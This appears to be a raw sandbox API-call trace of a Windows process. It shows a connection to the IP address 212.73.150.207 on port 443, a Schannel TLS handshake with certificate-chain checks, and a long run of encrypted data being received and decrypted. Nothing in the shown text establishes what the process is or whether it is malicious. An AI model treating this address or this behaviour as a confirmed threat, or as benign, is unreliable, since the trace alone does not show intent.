	[0907.453] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x356750, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0907.453] CoTaskMemFree (pv=0x356750) 
	[0907.453] WSAEventSelect (s=0x4e0, hEventObject=0x4e4, lNetworkEvents=512) returned 0
	[0907.455] GetAdaptersAddresses () returned 0x6f
	[0907.605] LocalAlloc (uFlags=0x0, uBytes=0xbe8) returned 0x1b88b790
	[0907.606] GetAdaptersAddresses () returned 0x0
	[0907.660] LocalFree (hMem=0x1b88b790) returned 0x0
	[0907.662] WSAConnect (in: s=0x4c8, name=0x2ff9540*(sa_family=2, sin_port=0x1bb, sin_addr="212.73.150.207"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0907.902] closesocket (s=0x4c4) returned 0
	[0908.017] EnumerateSecurityPackagesW (in: pcPackages=0x1c69d9b8, ppPackageInfo=0x1c69d9b0 | out: pcPackages=0x1c69d9b8, ppPackageInfo=0x1c69d9b0) returned 0x0
	[0908.020] lstrlenW (lpString="Negotiate") returned 9
	[0908.021] CoTaskMemAlloc (cb=0x16) returned 0x1b8720d0
	[0908.021] RtlMoveMemory (in: Destination=0x1b8720d0, Source=0x330b90, Length=0x14 | out: Destination=0x1b8720d0) 
	[0908.021] CoTaskMemFree (pv=0x1b8720d0) 
	[0908.021] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0908.021] CoTaskMemAlloc (cb=0x3c) returned 0x1b87fb60
	[0908.021] RtlMoveMemory (in: Destination=0x1b87fb60, Source=0x330ba4, Length=0x3a | out: Destination=0x1b87fb60) 
	[0908.021] CoTaskMemFree (pv=0x1b87fb60) 
	[0908.021] lstrlenW (lpString="NegoExtender") returned 12
	[0908.021] CoTaskMemAlloc (cb=0x1c) returned 0x1b873350
	[0908.021] RtlMoveMemory (in: Destination=0x1b873350, Source=0x330bde, Length=0x1a | out: Destination=0x1b873350) 
	[0908.021] CoTaskMemFree (pv=0x1b873350) 
	[0908.021] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0908.021] CoTaskMemAlloc (cb=0x3e) returned 0x1b87fb60
	[0908.021] RtlMoveMemory (in: Destination=0x1b87fb60, Source=0x330bf8, Length=0x3c | out: Destination=0x1b87fb60) 
	[0908.021] CoTaskMemFree (pv=0x1b87fb60) 
	[0908.021] lstrlenW (lpString="Kerberos") returned 8
	[0908.021] CoTaskMemAlloc (cb=0x14) returned 0x1b8720d0
	[0908.021] RtlMoveMemory (in: Destination=0x1b8720d0, Source=0x330c34, Length=0x12 | out: Destination=0x1b8720d0) 
	[0908.021] CoTaskMemFree (pv=0x1b8720d0) 
	[0908.021] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0908.021] CoTaskMemAlloc (cb=0x32) returned 0x1b8710d0
	[0908.021] RtlMoveMemory (in: Destination=0x1b8710d0, Source=0x330c46, Length=0x30 | out: Destination=0x1b8710d0) 
	[0908.021] CoTaskMemFree (pv=0x1b8710d0) 
	[0908.022] lstrlenW (lpString="NTLM") returned 4
	[0908.022] CoTaskMemAlloc (cb=0xc) returned 0x1b8720d0
	[0908.022] RtlMoveMemory (in: Destination=0x1b8720d0, Source=0x330c76, Length=0xa | out: Destination=0x1b8720d0) 
	[0908.022] CoTaskMemFree (pv=0x1b8720d0) 
	[0908.022] lstrlenW (lpString="NTLM Security Package") returned 21
	[0908.022] CoTaskMemAlloc (cb=0x2e) returned 0x1b8710d0
	[0908.022] RtlMoveMemory (in: Destination=0x1b8710d0, Source=0x330c80, Length=0x2c | out: Destination=0x1b8710d0) 
	[0908.022] CoTaskMemFree (pv=0x1b8710d0) 
	[0908.022] lstrlenW (lpString="Schannel") returned 8
	[0908.022] CoTaskMemAlloc (cb=0x14) returned 0x1b8720d0
	[0908.022] RtlMoveMemory (in: Destination=0x1b8720d0, Source=0x330cac, Length=0x12 | out: Destination=0x1b8720d0) 
	[0908.022] CoTaskMemFree (pv=0x1b8720d0) 
	[0908.022] lstrlenW (lpString="Schannel Security Package") returned 25
	[0908.022] CoTaskMemAlloc (cb=0x36) returned 0x1b8710d0
	[0908.022] RtlMoveMemory (in: Destination=0x1b8710d0, Source=0x330cbe, Length=0x34 | out: Destination=0x1b8710d0) 
	[0908.022] CoTaskMemFree (pv=0x1b8710d0) 
	[0908.022] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0908.022] CoTaskMemAlloc (cb=0x5c) returned 0x1b84b600
	[0908.022] RtlMoveMemory (in: Destination=0x1b84b600, Source=0x330cf2, Length=0x5a | out: Destination=0x1b84b600) 
	[0908.022] CoTaskMemFree (pv=0x1b84b600) 
	[0908.022] lstrlenW (lpString="Schannel Security Package") returned 25
	[0908.022] CoTaskMemAlloc (cb=0x36) returned 0x1b8710d0
	[0908.022] RtlMoveMemory (in: Destination=0x1b8710d0, Source=0x330d4c, Length=0x34 | out: Destination=0x1b8710d0) 
	[0908.022] CoTaskMemFree (pv=0x1b8710d0) 
	[0908.022] lstrlenW (lpString="WDigest") returned 7
	[0908.022] CoTaskMemAlloc (cb=0x12) returned 0x1b8720d0
	[0908.022] RtlMoveMemory (in: Destination=0x1b8720d0, Source=0x330d80, Length=0x10 | out: Destination=0x1b8720d0) 
	[0908.022] CoTaskMemFree (pv=0x1b8720d0) 
	[0908.022] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0908.022] CoTaskMemAlloc (cb=0x46) returned 0x1b87fb60
	[0908.022] RtlMoveMemory (in: Destination=0x1b87fb60, Source=0x330d90, Length=0x44 | out: Destination=0x1b87fb60) 
	[0908.022] CoTaskMemFree (pv=0x1b87fb60) 
	[0908.022] lstrlenW (lpString="TSSSP") returned 5
	[0908.022] CoTaskMemAlloc (cb=0xe) returned 0x1b8720d0
	[0908.022] RtlMoveMemory (in: Destination=0x1b8720d0, Source=0x330dd4, Length=0xc | out: Destination=0x1b8720d0) 
	[0908.022] CoTaskMemFree (pv=0x1b8720d0) 
	[0908.022] lstrlenW (lpString="TS Service Security Package") returned 27
	[0908.022] CoTaskMemAlloc (cb=0x3a) returned 0x1b87fb60
	[0908.022] RtlMoveMemory (in: Destination=0x1b87fb60, Source=0x330de0, Length=0x38 | out: Destination=0x1b87fb60) 
	[0908.023] CoTaskMemFree (pv=0x1b87fb60) 
	[0908.023] lstrlenW (lpString="pku2u") returned 5
	[0908.023] CoTaskMemAlloc (cb=0xe) returned 0x1b8720d0
	[0908.023] RtlMoveMemory (in: Destination=0x1b8720d0, Source=0x330e18, Length=0xc | out: Destination=0x1b8720d0) 
	[0908.023] CoTaskMemFree (pv=0x1b8720d0) 
	[0908.023] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0908.023] CoTaskMemAlloc (cb=0x30) returned 0x1b8710d0
	[0908.023] RtlMoveMemory (in: Destination=0x1b8710d0, Source=0x330e24, Length=0x2e | out: Destination=0x1b8710d0) 
	[0908.023] CoTaskMemFree (pv=0x1b8710d0) 
	[0908.023] lstrlenW (lpString="CREDSSP") returned 7
	[0908.023] CoTaskMemAlloc (cb=0x12) returned 0x1b8720d0
	[0908.023] RtlMoveMemory (in: Destination=0x1b8720d0, Source=0x330e52, Length=0x10 | out: Destination=0x1b8720d0) 
	[0908.023] CoTaskMemFree (pv=0x1b8720d0) 
	[0908.023] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0908.023] CoTaskMemAlloc (cb=0x4a) returned 0x1b87e920
	[0908.023] RtlMoveMemory (in: Destination=0x1b87e920, Source=0x330e62, Length=0x48 | out: Destination=0x1b87e920) 
	[0908.023] CoTaskMemFree (pv=0x1b87e920) 
	[0908.023] FreeContextBuffer (in: pvContextBuffer=0x330a50 | out: pvContextBuffer=0x330a50) returned 0x0
	[0908.029] GetCurrentProcess () returned 0xffffffffffffffff
	[0908.029] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69d498 | out: TokenHandle=0x1c69d498*=0x4c4) returned 1
	[0908.033] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2ffd6f8, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c69d3a8, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c69d398, ptsExpiry=0x1c69d390 | out: phCredential=0x1c69d398, ptsExpiry=0x1c69d390) returned 0x0
	[0908.056] InitializeSecurityContextW (in: phCredential=0x1c69d5a0, phContext=0x0, pTargetName=0x2ff2160, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c69d590, pOutput=0x2fffe40, pfContextAttr=0x1c69d588, ptsExpiry=0x1c69d580 | out: phNewContext=0x1c69d590, pOutput=0x2fffe40, pfContextAttr=0x1c69d588, ptsExpiry=0x1c69d580) returned 0x90312
	[0909.008] FreeContextBuffer (in: pvContextBuffer=0x341b30 | out: pvContextBuffer=0x341b30) returned 0x0
	[0909.014] send (s=0x4c8, buf=0x2ffff10*, len=118, flags=0) returned 118
	[0909.016] recv (in: s=0x4c8, buf=0x2ffff10, len=5, flags=0 | out: buf=0x2ffff10*) returned 5
	[0909.175] recv (in: s=0x4c8, buf=0x2ffff15, len=93, flags=0 | out: buf=0x2ffff15*) returned 93
	[0909.176] InitializeSecurityContextW (in: phCredential=0x1c69d4c0, phContext=0x1c69d770, pTargetName=0x2ff2160, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x3000220, Reserved2=0x0, phNewContext=0x1c69d4b0, pOutput=0x3000240, pfContextAttr=0x1c69d4a8, ptsExpiry=0x1c69d4a0 | out: phNewContext=0x1c69d4b0, pOutput=0x3000240, pfContextAttr=0x1c69d4a8, ptsExpiry=0x1c69d4a0) returned 0x90312
	[0909.178] recv (in: s=0x4c8, buf=0x3000330, len=5, flags=0 | out: buf=0x3000330*) returned 5
	[0909.178] recv (in: s=0x4c8, buf=0x3000355, len=2556, flags=0 | out: buf=0x3000355*) returned 2556
	[0909.178] InitializeSecurityContextW (in: phCredential=0x1c69d3f0, phContext=0x1c69d6a0, pTargetName=0x2ff2160, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x3000e28, Reserved2=0x0, phNewContext=0x1c69d3e0, pOutput=0x3000e48, pfContextAttr=0x1c69d3d8, ptsExpiry=0x1c69d3d0 | out: phNewContext=0x1c69d3e0, pOutput=0x3000e48, pfContextAttr=0x1c69d3d8, ptsExpiry=0x1c69d3d0) returned 0x90312
	[0909.180] recv (in: s=0x4c8, buf=0x3000f38, len=5, flags=0 | out: buf=0x3000f38*) returned 5
	[0909.180] recv (in: s=0x4c8, buf=0x3000f5d, len=331, flags=0 | out: buf=0x3000f5d*) returned 16
	[0909.180] recv (in: s=0x4c8, buf=0x3000f6d, len=315, flags=0 | out: buf=0x3000f6d*) returned 315
	[0909.187] InitializeSecurityContextW (in: phCredential=0x1c69d320, phContext=0x1c69d5d0, pTargetName=0x2ff2160, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x3001178, Reserved2=0x0, phNewContext=0x1c69d310, pOutput=0x3001198, pfContextAttr=0x1c69d308, ptsExpiry=0x1c69d300 | out: phNewContext=0x1c69d310, pOutput=0x3001198, pfContextAttr=0x1c69d308, ptsExpiry=0x1c69d300) returned 0x90312
	[0909.189] recv (in: s=0x4c8, buf=0x3001288, len=5, flags=0 | out: buf=0x3001288*) returned 5
	[0909.189] recv (in: s=0x4c8, buf=0x30012ad, len=4, flags=0 | out: buf=0x30012ad*) returned 4
	[0909.189] InitializeSecurityContextW (in: phCredential=0x1c69d250, phContext=0x1c69d500, pTargetName=0x2ff2160, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x3001388, Reserved2=0x0, phNewContext=0x1c69d240, pOutput=0x30013a8, pfContextAttr=0x1c69d238, ptsExpiry=0x1c69d230 | out: phNewContext=0x1c69d240, pOutput=0x30013a8, pfContextAttr=0x1c69d238, ptsExpiry=0x1c69d230) returned 0x90312
	[0909.205] FreeContextBuffer (in: pvContextBuffer=0x1b854320 | out: pvContextBuffer=0x1b854320) returned 0x0
	[0909.205] send (s=0x4c8, buf=0x3001478*, len=134, flags=0) returned 134
	[0909.205] recv (in: s=0x4c8, buf=0x3001478, len=5, flags=0 | out: buf=0x3001478*) returned 5
	[0909.312] recv (in: s=0x4c8, buf=0x300147d, len=1, flags=0 | out: buf=0x300147d*) returned 1
	[0909.312] InitializeSecurityContextW (in: phCredential=0x1c69d180, phContext=0x1c69d430, pTargetName=0x2ff2160, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x30015f0, Reserved2=0x0, phNewContext=0x1c69d170, pOutput=0x3001610, pfContextAttr=0x1c69d168, ptsExpiry=0x1c69d160 | out: phNewContext=0x1c69d170, pOutput=0x3001610, pfContextAttr=0x1c69d168, ptsExpiry=0x1c69d160) returned 0x90312
	[0909.314] recv (in: s=0x4c8, buf=0x3001700, len=5, flags=0 | out: buf=0x3001700*) returned 5
	[0909.314] recv (in: s=0x4c8, buf=0x3001725, len=48, flags=0 | out: buf=0x3001725*) returned 48
	[0909.314] InitializeSecurityContextW (in: phCredential=0x1c69d0b0, phContext=0x1c69d360, pTargetName=0x2ff2160, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x3001828, Reserved2=0x0, phNewContext=0x1c69d0a0, pOutput=0x3001848, pfContextAttr=0x1c69d098, ptsExpiry=0x1c69d090 | out: phNewContext=0x1c69d0a0, pOutput=0x3001848, pfContextAttr=0x1c69d098, ptsExpiry=0x1c69d090) returned 0x0
	[0909.671] QueryContextAttributesW (in: phContext=0x1c69d310, ulAttribute=0x4, pBuffer=0x3001960 | out: pBuffer=0x3001960) returned 0x0
	[0909.671] QueryContextAttributesW (in: phContext=0x1c69d310, ulAttribute=0x5a, pBuffer=0x30019e0 | out: pBuffer=0x30019e0) returned 0x0
	[0909.679] QueryContextAttributesW (in: phContext=0x1c69d1c0, ulAttribute=0x53, pBuffer=0x3001d30 | out: pBuffer=0x3001d30) returned 0x0
	[0909.685] CertDuplicateCRLContext (pCrlContext=0x1b84f580) returned 0x1b84f580
	[0909.688] CertDuplicateStore (hCertStore=0x30fa70) returned 0x30fa70
	[0909.689] CertEnumCertificatesInStore (hCertStore=0x30fa70, pPrevCertContext=0x0) returned 0x1b84f600
	[0909.689] CertDuplicateCRLContext (pCrlContext=0x1b84f600) returned 0x1b84f600
	[0909.689] CertEnumCertificatesInStore (hCertStore=0x30fa70, pPrevCertContext=0x1b84f600) returned 0x1b84f580
	[0909.689] CertDuplicateCRLContext (pCrlContext=0x1b84f580) returned 0x1b84f580
	[0909.689] CertEnumCertificatesInStore (hCertStore=0x30fa70, pPrevCertContext=0x1b84f580) returned 0x0
	[0909.690] CertCloseStore (hCertStore=0x30fa70, dwFlags=0x0) returned 1
	[0909.690] CertFreeCRLContext (pCrlContext=0x1b84f580) returned 1
	[0909.697] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x30f9a0
	[0909.698] CertAddCRLLinkToStore (in: hCertStore=0x30f9a0, pCrlContext=0x1b84f600, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0909.698] CertAddCRLLinkToStore (in: hCertStore=0x30f9a0, pCrlContext=0x1b84f580, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0909.700] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b84f580, pTime=0x1c69d1c8, hAdditionalStore=0x30f9a0, pChainPara=0x1c69d1d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c69d1c0 | out: ppChainContext=0x1c69d1c0) returned 1
	[0911.551] CertDuplicateCertificateChain (pChainContext=0x1cd41450) returned 0x1cd41450
	[0911.552] CertDuplicateCRLContext (pCrlContext=0x1b84f580) returned 0x1b84f580
	[0911.552] CertDuplicateCRLContext (pCrlContext=0x1cd84460) returned 0x1cd84460
	[0911.552] CertDuplicateCRLContext (pCrlContext=0x1cd844e0) returned 0x1cd844e0
	[0911.553] CertFreeCertificateChain (pChainContext=0x1cd41450) 
	[0911.554] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1cd41450, pPolicyPara=0x1c69d348, pPolicyStatus=0x1c69d328 | out: pPolicyStatus=0x1c69d328) returned 1
	[0911.555] SetLastError (dwErrCode=0x0) 
	[0911.561] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1cd41450, pPolicyPara=0x1c69d420, pPolicyStatus=0x1c69d408 | out: pPolicyStatus=0x1c69d408) returned 1
	[0911.563] CertFreeCertificateChain (pChainContext=0x1cd41450) 
	[0911.563] CertFreeCRLContext (pCrlContext=0x1b84f580) returned 1
	[0911.567] EncryptMessage (in: phContext=0x1c69d9d0, fQOP=0x0, pMessage=0x3004460, MessageSeqNo=0x0 | out: pMessage=0x3004460) returned 0x0
	[0911.567] send (s=0x4c8, buf=0x30041a0*, len=117, flags=0) returned 117
	[0911.581] setsockopt (s=0x4c8, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0
	[0911.581] recv (in: s=0x4c8, buf=0x30045c0, len=5, flags=0 | out: buf=0x30045c0*) returned 5
	[0911.824] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 1067
	[0911.824] recv (in: s=0x4c8, buf=0x3004a10, len=15349, flags=0 | out: buf=0x3004a10*) returned 15349
	[0912.331] DecryptMessage (in: phContext=0x1c69d590, pMessage=0x3008718, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3008718, pfQOP=0x0) returned 0x0
	[0912.360] setsockopt (s=0x4c8, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0
	[0912.380] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0912.380] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 6086
	[0912.380] recv (in: s=0x4c8, buf=0x3005dab, len=10330, flags=0 | out: buf=0x3005dab*) returned 10330
	[0912.647] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x3029d28, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3029d28, pfQOP=0x0) returned 0x0
	[0912.647] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0912.647] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 2529
	[0912.647] recv (in: s=0x4c8, buf=0x3004fc6, len=13887, flags=0 | out: buf=0x3004fc6*) returned 13887
	[0913.259] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x3029f68, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3029f68, pfQOP=0x0) returned 0x0
	[0913.266] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0913.266] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 3260
	[0913.266] recv (in: s=0x4c8, buf=0x30052a1, len=13156, flags=0 | out: buf=0x30052a1*) returned 13156
	[0913.653] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302a1a8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302a1a8, pfQOP=0x0) returned 0x0
	[0913.655] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0913.655] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 1847
	[0913.655] recv (in: s=0x4c8, buf=0x3004d1c, len=14569, flags=0 | out: buf=0x3004d1c*) returned 14569
	[0913.999] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302a410, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302a410, pfQOP=0x0) returned 0x0
	[0914.001] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0914.001] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 2578
	[0914.001] recv (in: s=0x4c8, buf=0x3004ff7, len=13838, flags=0 | out: buf=0x3004ff7*) returned 13838
	[0914.383] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302a678, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302a678, pfQOP=0x0) returned 0x0
	[0914.384] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0914.385] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 3309
	[0914.385] recv (in: s=0x4c8, buf=0x30052d2, len=13107, flags=0 | out: buf=0x30052d2*) returned 13107
	[0914.559] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302a8b8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302a8b8, pfQOP=0x0) returned 0x0
	[0914.560] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0914.560] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 1896
	[0914.560] recv (in: s=0x4c8, buf=0x3004d4d, len=14520, flags=0 | out: buf=0x3004d4d*) returned 14520
	[0914.735] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302aaf8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302aaf8, pfQOP=0x0) returned 0x0
	[0914.736] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0914.736] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 1019
	[0914.736] recv (in: s=0x4c8, buf=0x30049e0, len=15397, flags=0 | out: buf=0x30049e0*) returned 15397
	[0915.138] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302ad60, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302ad60, pfQOP=0x0) returned 0x0
	[0915.142] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0915.142] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 3894
	[0915.142] recv (in: s=0x4c8, buf=0x300551b, len=12522, flags=0 | out: buf=0x300551b*) returned 12522
	[0915.242] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302afa0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302afa0, pfQOP=0x0) returned 0x0
	[0915.243] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0915.243] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 337
	[0915.243] recv (in: s=0x4c8, buf=0x3004736, len=16079, flags=0 | out: buf=0x3004736*) returned 16079
	[0916.222] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302b1e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302b1e0, pfQOP=0x0) returned 0x0
	[0916.226] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 1
	[0916.226] recv (in: s=0x4c8, buf=0x30045e1, len=4, flags=0 | out: buf=0x30045e1*) returned 4
	[0916.364] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 532
	[0916.364] recv (in: s=0x4c8, buf=0x30047f9, len=15884, flags=0 | out: buf=0x30047f9*) returned 15884
	[0916.508] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302b448, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302b448, pfQOP=0x0) returned 0x0
	[0916.509] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0916.509] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 1263
	[0916.509] recv (in: s=0x4c8, buf=0x3004ad4, len=15153, flags=0 | out: buf=0x3004ad4*) returned 15153
	[0916.883] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302b688, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302b688, pfQOP=0x0) returned 0x0
	[0916.885] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0916.885] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 4138
	[0916.886] recv (in: s=0x4c8, buf=0x300560f, len=12278, flags=0 | out: buf=0x300560f*) returned 12278
	[0917.079] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302b918, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302b918, pfQOP=0x0) returned 0x0
	[0917.080] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0917.080] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 2725
	[0917.080] recv (in: s=0x4c8, buf=0x300508a, len=13691, flags=0 | out: buf=0x300508a*) returned 13691
	[0917.389] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302bb58, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302bb58, pfQOP=0x0) returned 0x0
	[0917.390] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0917.390] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 3456
	[0917.390] recv (in: s=0x4c8, buf=0x3005365, len=12960, flags=0 | out: buf=0x3005365*) returned 12960
	[0917.746] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302bdc0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302bdc0, pfQOP=0x0) returned 0x0
	[0917.748] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0917.748] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 4187
	[0917.748] recv (in: s=0x4c8, buf=0x3005640, len=12229, flags=0 | out: buf=0x3005640*) returned 12229
	[0918.068] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302c000, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302c000, pfQOP=0x0) returned 0x0
	[0918.069] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0918.069] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 4382
	[0918.069] recv (in: s=0x4c8, buf=0x3005703, len=12034, flags=0 | out: buf=0x3005703*) returned 12034
	[0918.668] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302c240, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302c240, pfQOP=0x0) returned 0x0
	[0918.669] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0918.669] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 6185
	[0918.669] recv (in: s=0x4c8, buf=0x3005e0e, len=10231, flags=0 | out: buf=0x3005e0e*) returned 10231
	[0918.826] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302c4a8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302c4a8, pfQOP=0x0) returned 0x0
	[0918.827] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0918.827] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 1556
	[0918.827] recv (in: s=0x4c8, buf=0x3004bf9, len=14860, flags=0 | out: buf=0x3004bf9*) returned 14860
	[0919.506] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302c6e8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302c6e8, pfQOP=0x0) returned 0x0
	[0919.507] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0919.507] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 2287
	[0919.507] recv (in: s=0x4c8, buf=0x3004ed4, len=14129, flags=0 | out: buf=0x3004ed4*) returned 14129
	[0919.710] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302c950, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302c950, pfQOP=0x0) returned 0x0
	[0919.711] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0919.711] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 874
	[0919.711] recv (in: s=0x4c8, buf=0x300494f, len=15542, flags=0 | out: buf=0x300494f*) returned 15542
	[0920.109] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302cb90, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302cb90, pfQOP=0x0) returned 0x0
